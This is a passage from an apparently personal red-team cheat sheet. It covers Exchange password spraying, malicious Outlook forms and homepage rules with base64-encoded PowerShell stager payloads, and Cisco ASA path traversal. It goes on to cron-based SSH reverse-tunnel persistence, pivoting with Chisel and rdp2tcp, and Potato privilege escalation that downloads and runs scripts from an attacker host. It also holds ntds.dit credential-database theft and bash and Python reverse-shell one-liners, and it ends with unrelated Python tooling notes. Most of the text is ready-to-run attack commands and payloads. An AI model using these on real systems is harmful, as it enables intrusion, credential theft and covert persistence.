-OutFile owa-valid-users.txt ``` ### Password Spray #### Ruler * [https://github.com/sensepost/ruler/wiki/Brute-Force#brute-force-for-credentials](https://github.com/sensepost/ruler/wiki/Brute-Force#brute-force-for-credentials) Autodiscover URL implicit: ``` $ ./ruler -k -d megacorp.com brute --users users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a ruler-blood.out ``` Autodiscover URL explicit: ``` $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com brute --users users.txt --passwords passwords.txt --delay 35 --attempts 3 --verbose | tee -a ruler-all.out ``` Notes: * In users.txt there's only "username" on a line, not "DOMAIN\username". * Errors like `ERROR: 04:27:43 brute.go:193: An error occured in connection - Get https://autodiscover.megacorp.com/autodiscover/autodiscover.xml: Get https://autodiscover.megacorp.com/autodiscover/autodiscover.xml: net/http: request canceled` do **not** affect the current password probe. ### Parse NTLM * [https://github.com/nyxgeek/ntlmscan](https://github.com/nyxgeek/ntlmscan) * [https://gist.github.com/aseering/829a2270b72345a1dc42](https://gist.github.com/aseering/829a2270b72345a1dc42) #### Nmap ``` $ sudo nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 mx.megacorp.com ``` #### Metasploit ``` msf > use auxiliary/scanner/http/owa_login ``` #### MailSniper ``` PS > Invoke-DomainHarvestOWA -ExchHostname mx.megacorp.com ``` #### get_ad_domain.zip ``` $ python get_ad_domain.zip -m owa mx.megacorp.com ``` ## Outlook ### Ruler * [https://github.com/sensepost/ruler/releases](https://github.com/sensepost/ruler/releases) #### Rules * [https://github.com/sensepost/ruler/wiki/Rules](https://github.com/sensepost/ruler/wiki/Rules) * [https://silentbreaksecurity.com/malicious-outlook-rules/](https://silentbreaksecurity.com/malicious-outlook-rules/) #### Forms * [https://github.com/sensepost/ruler/wiki/Forms](https://github.com/sensepost/ruler/wiki/Forms) * [https://sensepost.com/blog/2017/outlook-forms-and-shells/](https://sensepost.com/blog/2017/outlook-forms-and-shells/) Display forms: ``` $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form display ``` Exploit: ``` $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form add --suffix test-form --input vbs-payload.txt --send ``` ```(vbs-payload.txt.b64) Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuICJwb3dlcnNoZWxsIC1leGVjIGJ5cGFzcyAtZW5jIEpBQndBSElBYndCNEFIa0FRUUJrQUdRQWNnQTlBQ2dBUndCbEFIUUFMUUJKQUhRQVpRQnRBRkFBY2dCdkFIQUFaUUJ5QUhRQWVRQWdBQ0lBU0FCTEFFTUFWUUE2QUZ3QVV3QnZBR1lBZEFCM0FHRUFjZ0JsQUZ3QVRRQnBBR01BY2dCdkFITUFid0JtQUhRQVhBQlhBR2tBYmdCa0FHOEFkd0J6QUZ3QVF3QjFBSElBY2dCbEFHNEFkQUJXQUdVQWNnQnpBR2tBYndCdUFGd0FTUUJ1QUhRQVpRQnlBRzRBWlFCMEFDQUFVd0JsQUhRQWRBQnBBRzRBWndCekFDSUFLUUF1QUZBQWNnQnZBSGdBZVFCVEFHVUFjZ0IyQUdVQWNnQTdBQ1FBY0FCeUFHOEFlQUI1QUQwQVRnQmxBSGNBTFFCUEFHSUFhZ0JsQUdNQWRBQWdBRk1BZVFCekFIUUFaUUJ0QUM0QVRnQmxBSFFBTGdCWEFHVUFZZ0JRQUhJQWJ3QjRBSGtBT3dBa0FIQUFjZ0J2QUhnQWVRQXVBRUVBWkFCa0FISUFaUUJ6QUhNQVBRQWtBSEFBY2dCdkFIZ0FlUUJCQUdRQVpBQnlBRHNBSkFCd0FISUFid0I0QUhrQUxnQlZBSE1BWlFCRUFHVUFaZ0JoQUhVQWJBQjBBRU1BY2dCbEFHUUFaUUJ1QUhRQWFRQmhBR3dBY3dBOUFDUUFkQUJ5QUhVQVpRQTdBQ1FBWXdCc0FHa0FaUUJ1QUhRQVBRQk9BR1VBZHdBdEFFOEFZZ0JxQUdVQVl3QjBBQ0FBVXdCNUFITUFkQUJsQUcwQUxnQk9BR1VBZEFBdUFGY0FaUUJpQUVNQWJBQnBBR1VBYmdCMEFEc0FKQUJqQUd3QWFRQmxBRzRBZEFBdUFGQUFjZ0J2QUhnQWVRQTlBQ1FBY0FCeUFHOEFlQUI1QURzQUpBQmpBR3dBYVFCbEFHNEFkQUF1QUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJHQUdrQWJBQmxBQ2dBSWdCb0FIUUFkQUJ3QURvQUx3QXZBREVBTUFBdUFERUFNQUF1QURFQU13QXVBRE1BTndBdkFHZ0FkQUIwQUhBQWN3QTBBRFFBTXdBdUFHVUFlQUJsQUNJQUxBQWlBQ1FBWlFCdUFIWUFPZ0IxQUhNQVpRQnlBSEFBY2dCdkFHWUFhUUJzQUdVQVhBQnRBSFVBY3dCcEFHTUFYQUJvQUhRQWRBQndBSE1BTkFBMEFETUFMZ0JsQUhnQVpRQWlBQ2tBT3dBa0FHVUFlQUJsQUdNQVBRQk9BR1VBZHdBdEFFOEFZZ0JxQUdVQVl3QjBBQ0FBTFFCakFHOEFiUUFnQUhNQWFBQmxBR3dBYkFBdUFHRUFjQUJ3QUd3QWFRQmpBR0VBZEFCcEFHOEFiZ0E3QUNRQVpRQjRBR1VBWXdBdUFITUFhQUJsQUd3QWJBQmxBSGdBWlFCakFIVUFkQUJsQUNnQUlnQWtBR1VBYmdCMkFEb0FkUUJ6QUdVQWNnQndBSElBYndCbUFHa0FiQUJsQUZ3QWJRQjFBSE1BYVFCakFGd0FhQUIwQUhRQWNBQnpBRFFBTkFBekFDNEFaUUI0QUdVQUlnQXBBQW9BIiwgMCwgZmFsc2UK ``` Cleanup: ``` $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form delete --suffix test-form ``` Empire stager encryption: ``` $ grep -e output_type -e payload_type -e clean_output -e userdomain genetic.config output_type = GO payload_type = DLL_x64 clean_output = True userdomain = 'MEGACORP' $ python ebowla.py https443.dll genetic.config $ ./build_x64_go.sh output/go_symmetric_https443.dll.go https443.exe --hidden ``` #### Homepage * [https://github.com/sensepost/ruler/wiki/Homepage](https://github.com/sensepost/ruler/wiki/Homepage) * [https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/](https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/) Exploit: ``` $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage add --url http://10.10.13.37/homepage.html ``` ```(homepage.html.b64) PGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MiI+Cjx0aXRsZT5PdXRsb29rPC90aXRsZT4KPHNjcmlwdCBpZD1jbGllbnRFdmVudEhhbmRsZXJzVkJTIGxhbmd1YWdlPXZic2NyaXB0Pgo8IS0tCiBTdWIgd2luZG93X29ubG9hZCgpCiAgICAgU2V0IEFwcGxpY2F0aW9uID0gVmlld0N0bDEuT3V0bG9va0FwcGxpY2F0aW9uCiAgICAgU2V0IGNtZCA9IEFwcGxpY2F0aW9uLkNyZWF0ZU9iamVjdCgiV3NjcmlwdC5TaGVsbCIpCiAgICAgY21kLlJ1bigicG93ZXJzaGVsbCAtZXhlYyBieXBhc3MgLWUgSkFCd0FISUFid0I0QUhrQVFRQmtBR1FBY2dBOUFDZ0FSd0JsQUhRQUxRQkpBSFFBWlFCdEFGQUFjZ0J2QUhBQVpRQnlBSFFBZVFBZ0FDSUFTQUJMQUVNQVZRQTZBRndBVXdCdkFHWUFkQUIzQUdFQWNnQmxBRndBVFFCcEFHTUFjZ0J2QUhNQWJ3Qm1BSFFBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRndBUXdCMUFISUFjZ0JsQUc0QWRBQldBR1VBY2dCekFHa0Fid0J1QUZ3QVNRQnVBSFFBWlFCeUFHNEFaUUIwQUNBQVV3QmxBSFFBZEFCcEFHNEFad0J6QUNJQUtRQXVBRkFBY2dCdkFIZ0FlUUJUQUdVQWNnQjJBR1VBY2dBN0FDUUFjQUJ5QUc4QWVBQjVBRDBBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FGTUFlUUJ6QUhRQVpRQnRBQzRBVGdCbEFIUUFMZ0JYQUdVQVlnQlFBSElBYndCNEFIa0FPd0FrQUhBQWNnQnZBSGdBZVFBdUFFRUFaQUJrQUhJQVpRQnpBSE1BUFFBa0FIQUFjZ0J2QUhnQWVRQkJBR1FBWkFCeUFEc0FKQUJ3QUhJQWJ3QjRBSGtBTGdCVkFITUFaUUJFQUdVQVpnQmhBSFVBYkFCMEFFTUFjZ0JsQUdRQVpRQnVBSFFBYVFCaEFHd0Fjd0E5QUNRQWRBQnlBSFVBWlFBN0FDUUFZd0JzQUdrQVpRQnVBSFFBUFFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQURzQUpBQmpBR3dBYVFCbEFHNEFkQUF1QUZBQWNnQnZBSGdBZVFBOUFDUUFjQUJ5QUc4QWVBQjVBRHNBSkFCakFHd0FhUUJsQUc0QWRBQXVBRVFBYndCM0FHNEFiQUJ2QUdFQVpBQkdBR2tBYkFCbEFDZ0FJZ0JvQUhRQWRBQndBRG9BTHdBdkFERUFNQUF1QURFQU1BQXVBREVBTXdBdUFETUFOd0F2QUhNQWRBQmhBR2NBWlFCeUFEWUFOQUF1QUdRQWJBQnNBQ0lBTEFBaUFDUUFaUUJ1QUhZQU9nQjFBSE1BWlFCeUFIQUFjZ0J2QUdZQWFRQnNBR1VBWEFCdEFIVUFjd0JwQUdNQVhBQnpBSFFBWVFCbkFHVUFjZ0EyQURRQUxnQmtBR3dBYkFBaUFDa0FPd0FrQUdVQWVBQmxBR01BUFFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFMUUJqQUc4QWJRQWdBSE1BYUFCbEFHd0FiQUF1QUdFQWNBQndBR3dBYVFCakFHRUFkQUJwQUc4QWJnQTdBQ1FBWlFCNEFHVUFZd0F1QUhNQWFBQmxBR3dBYkFCbEFIZ0FaUUJqQUhVQWRBQmxBQ2dBSWdCeUFIVUFiZ0JrQUd3QWJBQXpBRElBSWdBc0FDSUFKQUJsQUc0QWRnQTZBSFVBY3dCbEFISUFjQUJ5QUc4QVpnQnBBR3dBWlFCY0FHMEFkUUJ6QUdrQVl3QmNBSE1BZEFCaEFHY0FaUUJ5QURZQU5BQXVBR1FBYkFCc0FDSUFLUUFLQUE9PSIpCiBFbmQgU3ViCi0tPgoKPC9zY3JpcHQ+CjwvaGVhZD4KCjxib2R5PgogPG9iamVjdCBjbGFzc2lkPSJjbHNpZDowMDA2RjA2My0wMDAwLTAwMDAtQzAwMC0wMDAwMDAwMDAwNDYiIGlkPSJWaWV3Q3RsMSIgZGF0YT0iIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIj48L29iamVjdD4KPC9ib2R5Pgo8L2h0bWw+Cg== ``` Cleanup: ``` $ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage delete ``` Stager encryption is the same as for Ruler/Forms. ## Sharepoint * [https://www.crummie5.club/the-lone-sharepoint/](https://www.crummie5.club/the-lone-sharepoint/) ## 1C * [https://t.me/webpwn/280](https://t.me/webpwn/280) ## Cisco ### ASA Path Traversal **CVE-2020-3452** Check manually: ``` https://cisco.example.com/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua https://cisco.example.com/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ ``` Check with MSF: ``` msf > use auxiliary/scanner/http/cisco_directory_traversal ``` # Persistence ## Linux ### SSH Tunnel in Crontab ```bash #!/bin/bash if [[ `ps -ef | grep -c 2222` -eq 1 ]]; then /usr/bin/ssh -nNT -R 2222:localhost:22 -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -i /home/alice/.ssh/.k [email protected] fi ``` Attacker's box ``` $ sudo useradd -ms /bin/false nopty $ sudo ssh-keygen -f /home/nopty/.ssh/dummy_key -t ed25519 -q -N "" $ cat /home/nopty/.ssh/dummy_key.pub $ sudo vi /home/nopty/.ssh/authorized_keys from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty <DUMMY_KEY_PUB> ``` Victim's box: ``` $ curl 10.10.13.37/dummy_key > /home/alice/.ssh/.k $ chmod 600 /home/alice/.ssh/.k $ curl 10.10.13.37/callback.sh > /home/alice/.conf $ chmod +x /home/alice/.conf $ crontab -e */15 * * * * /home/alice/.conf ``` # Pivoting * [PayloadsAllTheThings/Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) * [https://www.programmersought.com/article/93593867459/](https://www.programmersought.com/article/93593867459/) ## SSH * [https://habr.com/ru/post/331348/](https://habr.com/ru/post/331348/) ### Local vs Remote Port Forwarding A cheatsheet for SSH Local/Remote Forwarding command syntax: * `-L 1111:127.0.0.1:2222`: the traffic is forwarded *from SSH client via SSH server*, so `1111` is listening on *client-side* and traffic is sent to `2222` on *server-side*. * `-R 2222:127.0.0.1:1111`: the traffic is forwarded *from SSH server via SSH client*, so `2222` is listening on *server-side* and traffic is sent to `1111` on *client-side*. Consider the following example. An attacker has root privileges on Pivot1. He creates the first SSH tunnel (remote port forwarding) to interact with a vulnerable web server on Pivot2. Then he exploits the vulnerability on Pivot2 and triggers it to connect back to Attacker via a reverse-shell (firewall is active, so he needs to pivot through port 443, which is allowed). After that the attacker performs PE on Pivot2 and gets root. Then he creates another tunnel (local port forwarding) over the first one to SSH into Pivot2 from Attacker. Finally, he forwards port 80 over two existing hops to reach another vulnerable web server on Victim. ``` Attacker (10.10.13.37) Pivot1 (10.1.1.1) Pivot2 (10.2.2.2) Victim (10.3.3.3) ┌──────────────────────────────────────────────────────────────────────┐ ┌───────────────────────────────────────────────┐ ┌────────────────────────────────┐ ┌───────────────────┐ │ 22 │ │ │ │ │ │ │ │ 1. ssh -R 443:127.0.0.1:9001 [email protected] ------------------------------► 10.1.1.1:22 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 2. │ │ Listens 0.0.0.0:443 ("GatewayPorts yes") │ │ │ │ │ │ │ │ │ │ │ │ │ │ 3. │ │ ~C ssh> -L 9002:10.2.2.2:80 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 4. Listens 127.0.0.1:9002 (to interact with web server 10.2.2.2:80) │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 5. shellpop -H 10.2.2.2 -P 443 --reverse --number 8 --base64 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 9001 over 10.1.1.1:22 │ │ 443 │ │ │ │ │ │ 6. rlwrap nc -lvnp 9001 ◄--- 127.0.0.1:9001 ◄----------------------------- 0.0.0.0:443 ◄───────────────────────────────┼──┼── Web server 10.2.2.2:80 │ │ │ │ │ │ │ │ │ │ │ │ 7. Got shell from 10.2.2.2 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 8. Got root on 10.2.2.2 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ~C ssh> -L 9003:127.0.0.1:1337 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 9. Listens 127.0.0.1:9003 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 22 │ │ │ │ │ │ │ │ ssh -L 1337:127.0.0.1:22 [email protected] ----------► 10.2.2.2:22 │ │ │ │ │ │ │ │ │ │ │ │ │ │ Listens 127.0.0.1:1337 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 1337 over 10.1.1.1:22 │ │ 22 over 10.2.2.2:22 │ │ │ │ │ │ 10. ssh [email protected] -p 9003 -------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ~C ssh> -L 9004:10.3.3.3:80 │ │ │ │ │ │ │ │ │ │ │ │ 11. Listens 127.0.0.1:9004 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 1337 over 10.1.1.1:22 │ │ 22 over 10.2.2.2:22 │ │ │ │ │ │ 12. curl http://127.0.0.1:9004/ ------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 ────────────────┼──┼─► 10.3.3.3:80 │ │ │ │ │ │ │ │ │ └──────────────────────────────────────────────────────────────────────┘ └───────────────────────────────────────────────┘ └────────────────────────────────┘ └───────────────────┘ ``` Notes: * `1` For SSH server to listen at `0.0.0.0` instead of `127.0.0.1`, the `GatewayPorts yes` must be set in `/etc/ssh/sshd_config`. * `1` With SSH (or Chisel, for example) **server** running on the Attacker the same can be achieved by doing **local** port forwarding instead of **remote**. ``` snovvcrash@attacker:$ ./chisel server -p 8000 root@pivot1:# nohup ./chisel client 10.10.13.37:8000 443:127.0.0.1:9001 & root@pivot1:# netstat -tulpan | grep 443 tcp6 0 0 :::443 :::* LISTEN 18406/./chisel snovvcrash@attacker:$ rlwrap nc -lvnp 9001 ``` ### Remote Dynamic Forwarding * Attacker's IP: `10.10.13.37` * Victims's IP: `10.10.13.38` An example how to safely set remote dynamic port forwarding (SOCKS) with a builin SSH client. Generate a dummy SSH key on Victim: ``` alice@victim:$ ssh-keygen -f dummy_key -t ed25519 -q -N "" ``` Add `dummy_key.pub` contents to `authorized_keys` on Attacker with the following options: ``` snovvcrash@victim:$ vi ~/.ssh/authorized_keys from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty <DUMMY_KEY_PUB> ``` Connect to Attacker's SSH server from Victim: ``` alice@victim:$ ssh -fN -R 1080 -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -i dummy_key [email protected] ``` ## Chisel 1. [https://github.com/jpillora/chisel/releases](https://github.com/jpillora/chisel/releases) 2. [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel) 3. [https://snovvcrash.github.io/2020/03/17/htb-reddish.html#chisel-socks](https://snovvcrash.github.io/2020/03/17/htb-reddish.html#chisel-socks) * Attacker's IP: `10.10.13.37` * Victims's IP: `10.10.13.38` Reverse local port `1111` (on Victim) to local port `2222` (on Attacker): ``` $ wget [1/linux] $ gunzip chisel*.gz && rm chisel*.gz && mv chisel* chisel && chmod +x chisel $ wget [1/windows] $ gunzip chisel*.exe.gz && rm chisel*.exe.gz && mv chisel*.exe chisel.exe && upx chisel.exe $ md5sum chisel.exe $ ./chisel server -p 8000 -v --reverse PS > (new-object net.webclient).downloadfile("http://10.10.13.37/chisel.exe", "$env:userprofile\music\chisel.exe") PS > get-filehash -alg md5 chisel.exe PS > Start-Process -NoNewWindow -FilePath .\chisel.exe -ArgumentList "client 10.10.13.37:8000 R:127.0.0.1:2222:127.0.0.1:1111" ``` Socks5 proxy with Chisel in server mode: ``` alice@victim:$ ./chisel server -p 8000 --socks5 & root@kali:$ ./chisel client 10.10.13.38:8000 socks ``` Socks5 proxy with Chisel in server mode when direct connection to server is not available (not relevant as Chisel supports socks5 in client mode now): ``` root@kali:$ ./chisel server -p 8000 --reverse alice@victim:$ ./chisel client 10.10.13.37:8000 R:127.0.0.1:8001:127.0.0.1:8002 & alice@victim:$ ./chisel server -v -p 8002 --socks5 & root@kali:$ ./chisel client 127.0.0.1:8001 1080:socks ``` Socks5 proxy with Chisel in client mode: ``` root@kali:$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash:'Passw0rd!'] alice@victim:$ ./chisel client [--fingerprint <BASE64_STRING>] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:socks ``` ## revsocks * [https://github.com/kost/revsocks](https://github.com/kost/revsocks) ``` root@kali:$ ./revsocks -listen :8000 -socks 127.0.0.1:1080 -pass 'Passw0rd!' alice@victim:$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!' ``` ## TCP over RDP * [https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/](https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/) ### xfreerdp + rdp2tcp * [https://github.com/V-E-O/rdp2tcp](https://github.com/V-E-O/rdp2tcp) * [https://github.com/NotMedic/rdp-tunnel](https://github.com/NotMedic/rdp-tunnel) ``` $ xfreerdp /u:snovvcrash /p:'Passw0rd!' [/d:megacorp.local] /v:PC01.megacorp.local /dynamic-resolution /drive:www,/home/snovvcrash/www +clipboard /rdp2tcp:/home/snovvcrash/tools/rdp-tunnel/rdp2tcp ``` Reverse local port 9002 (on Victim) to local port 9001 on Attacker (good for reverse shells): ``` $ python rdp2tcp.py add reverse 127.0.0.1 9001 127.0.0.1 9002 ``` Forward local port 9001 (on Attacker) to local port 9002 on Victim (good for bind shells): ``` $ python rdp2tcp.py add forward 127.0.0.1 9001 127.0.0.1 9002 ``` Reverse tunnel web access via SOCKS proxy: * [https://serverfault.com/a/361806/554483](https://serverfault.com/a/361806/554483) ``` $ python rdp2tcp.py add socks5 127.0.0.1 1080 $ python rdp2tcp.py add reverse 127.0.0.1 1080 127.0.0.1 9003 ``` Other `xfreerdp` tips: * Disable NLA with `-sec-nla` switch if user's password is expired. ## proxychains-ng * [https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) Install: ``` $ git clone https://github.com/rofl0r/proxychains-ng ~/tools/proxychains-ng && cd ~/tools/proxychains-ng $ ./configure --prefix=/usr --sysconfdir=/etc $ make $ sudo make install $ sudo make install-config + edit /etc/proxychains.conf ``` # Privileges Abuse * [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin) ## SeImpersonatePrivilege * [https://github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) ### Potatoes * [https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html) #### foxglovesec/RottenPotato * [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) * [https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/](https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/) * [https://github.com/foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) ``` $ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe meterpreter > upload r.exe meterpreter > load incognito meterpreter > execute -cH -f r.exe meterpreter > list_tokens -u meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" ``` #### decoder/the-lonely-potato * [https://decoder.cloud/2017/12/23/the-lonely-potato/](https://decoder.cloud/2017/12/23/the-lonely-potato/) #### ohpe/juicy-potato * [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases) * [https://github.com/ivanitlearning/Juicy-Potato-x86/releases](https://github.com/ivanitlearning/Juicy-Potato-x86/releases) * [https://ohpe.it/juicy-potato/CLSID](https://ohpe.it/juicy-potato/CLSID) ``` $ curl -L https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe > j.exe $ curl -L https://github.com/samratashok/nishang/raw/master/Shells/Invoke-PowerShellTcpOneLine.ps1 > rev.ps1 ...Change LHOST to 10.10.13.37 and LPORT to 443... Cmd > certutil -urlcache -split -f http://10.10.13.37/j.exe C:\Windows\System32\spool\drivers\color\j.exe Cmd > echo cmd /c powershell -exec bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" > rev.bat $ sudo rlwrap nc -lvnp 443 Cmd > .\j.exe -l 1337 -p C:\Windows\System32\spool\drivers\color\rev.bat -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} ``` ### PrintSpoofer * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) * [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) * [https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-BadPotato.ps1](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-BadPotato.ps1) ``` PS > . .\Invoke-BadPotato.ps1; Invoke-BadPotato -C "C:\Users\snovvcrash\music\pwn.exe" ``` ### Restore Privilege * [https://itm4n.github.io/localservice-privileges/](https://itm4n.github.io/localservice-privileges/) ## SeBackupPrivilege ### SeBackupPrivilege * [https://github.com/giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) ``` wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll upload SeBackupPrivilegeCmdLets.dll upload SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll Import-Module .\SeBackupPrivilegeUtils.dll Copy-FileSeBackupPrivilege W:\Windows\NTDS\ntds.dit C:\Users\snovvcrash\Documents\ntds.dit -Overwrite download ntds.dit ``` ### robocopy ``` PS > cmd /c where robocopy PS > robocopy /B W:\Windows\NTDS\ntds.dit C:\Users\snovvcrash\Documents\ntds.dit ``` # Python ## pip Freeze dependencies: ``` $ pip freeze --local [-r requirements.txt] > requirements.txt ``` ## Linting ### flake8 ``` $ python3 -m flake8 --ignore=W191,E501,E722 somefile.py ``` ### pylint ``` $ python3 -m pylint --disable=W0311,C0301,R0912,R0915,C0103,C0114,R0903 --msg-template='{msg_id}:{line:3d},{column:2d}:{obj}:{msg}' somefile.py ``` ## PyPI ### twine ``` $ python setup.py sdist bdist_wheel [--bdist-dir ~/temp/bdistwheel] $ twine check dist/* $ twine upload --repository-url https://test.pypi.org/legacy/ dist/* $ twine upload dist/* ``` ## Misc ### Fix Python 2.7 Registry ``` Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7] [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7\Help] [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7\Help\MainPythonDocumentation] @="C:\\Python27\\Doc\\python26.chm" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7\InstallPath] @="C:\\Python27\\" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7\InstallPath\InstallGroup] @="Python 2.7" [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7\Modules] [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Python\PythonCore\2.7\PythonPath] @="C:\\Python27\\Lib;C:\\Python27\\DLLs;C:\\Python27\\Lib\\lib-tk" ``` # RE ## Ghidra Download through Tor: * [https://ghidra-sre.org/](https://ghidra-sre.org/) Install: ``` $ mv /opt/tor-browser/Browser/Downloads/ghidra*.zip ~/tools $ cd ~/tools && unzip ghidra*.zip && rm ghidra*.zip && mv ghidra* ghidra && cd - $ sudo apt install openjdk-11-jdk ``` # Reverse Shells * [https://securixy.kz/hack-faq/reverse-shell-ili-bjekkonnekt.html/](https://securixy.kz/hack-faq/reverse-shell-ili-bjekkonnekt.html/) ## Bash ```bash /bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f ``` ## Python ### IPv4 ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close() import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close() ``` ### IPv6 ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close() 